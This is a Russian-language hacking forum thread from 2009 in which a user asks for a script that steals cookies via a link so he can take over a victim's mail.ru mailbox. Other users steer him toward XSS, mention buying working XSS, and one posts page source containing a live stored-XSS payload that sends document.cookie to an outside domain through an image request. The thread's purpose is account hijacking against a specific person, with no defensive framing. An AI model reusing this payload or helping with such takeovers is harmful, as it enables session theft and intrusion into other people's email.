Как сделать ссылку, при переходе на которую воруются куки?

Discussion in 'Песочница' started by Digital111, 30 Apr 2009.

  1. Digital111

    Digital111 Member

    Joined:
    9 Feb 2009
    Messages:
    7
    Likes Received:
    90
    Reputations:
    0
    *Неактуально*

    *Неактуально*
     
    #1 Digital111, 30 Apr 2009
    Last edited: 3 Aug 2009
    5 people like this.
  2. RumShun

    RumShun Member

    Joined:
    27 Oct 2008
    Messages:
    283
    Likes Received:
    75
    Reputations:
    6
    почитай про фейки и XSS
     
  3. spider-intruder

    spider-intruder Elder - Старейшина

    Joined:
    9 Dec 2005
    Messages:
    700
    Likes Received:
    339
    Reputations:
    37
    Ссылка должна быть на том же домене, от которого ты хочешь куку. Забрать куку от почты можно только если твой скрипт воровства куков будет на том же домене что и почтовый ящик. Читай про Cross Site Scripting (XSS)
     
  4. Digital111

    Digital111 Member

    Joined:
    9 Feb 2009
    Messages:
    7
    Likes Received:
    90
    Reputations:
    0
    Помогите пожалуйста написать такой скрипт, я сам не смогу. У меня и у жертвы ящик на mail.ru.
     
    2 people like this.
  5. max_max

    max_max Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    150
    Likes Received:
    181
    Reputations:
    4
    Digital111,
    http://forum.antichat.ru/thread70397.html
     
    1 person likes this.
  6. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Нет, ну парень действительно прав, я считаю что многих интересует "ссылка крижи куки", я вот тоже многог статей2 обчитал, но везде только поверхностно говориться(((
    ЗЫ: я новичек, где здесь находиться паблик (глянуть свежиt xss)
     
  7. Player#1

    Player#1 Member

    Joined:
    11 Nov 2008
    Messages:
    95
    Likes Received:
    35
    Reputations:
    10
    в этих темах смотри:
    http://forum.antichat.ru/thread88986.html
    http://forum.antichat.ru/thread35802.html

    но щас нету рабочих хсс, так что ищи сам или покупай...
     
  8. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    а вот смотри, допустим я нашол xss, вставил запрос куки на сниффер(скрипт), все пашед, потом етот баг прикріваеться(я напиример ету xxs выложил в паблик все уже о ней узнал и потом решили ее прикрыть) когда я в 1-й раз кинул скрипт, его тоже потом прикроют, а то я знаю 1 xss я не могу вкинуть скрипт , а кто то раньше кинул и он работает и ворует куки!
     
  9. max_max

    max_max Elder - Старейшина

    Joined:
    23 Apr 2007
    Messages:
    150
    Likes Received:
    181
    Reputations:
    4
    LemoTTT, даже ребенок понял какую х..ю ты сказал :(
     
  10. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Может ты норм ответиш?!
     
  11. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Вот тут внедрен скрипт которій крадет куки
    http://jamber.info/profile/KISA_Anfisa.html
    как мне так сделать, если ничего не получаеться((
     
  12. LemoTTT

    LemoTTT Member

    Joined:
    29 Apr 2009
    Messages:
    45
    Likes Received:
    6
    Reputations:
    0
    Если глянуть исходный текст, то мы видим крижу куки, как мне так сделать?
    HTML:
     <div style="font-size: 17px; font-weight: bold;">О себе:</div><br />        <div style="font-size: 12px;">  я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script>      </div>        <div id="about_editor" style="display: none;"><br /><br />          <textarea id="about_textarea" name="about_textarea" onkeyup="AboutEditor_MinChar();" style="width: 100%;">я люблю только это:р<script>img = new Image(); img.src = "http://comp-info.ru/pic/image.jpg?"+document.cookie;</script></textarea><br />          <div align="center">
     
  13. RumShun

    RumShun Member

    Joined:
    27 Oct 2008
    Messages:
    283
    Likes Received:
    75
    Reputations:
    6
    , а я не понял :(
    это потомушто в каждом случае требуеться индивидуальный подход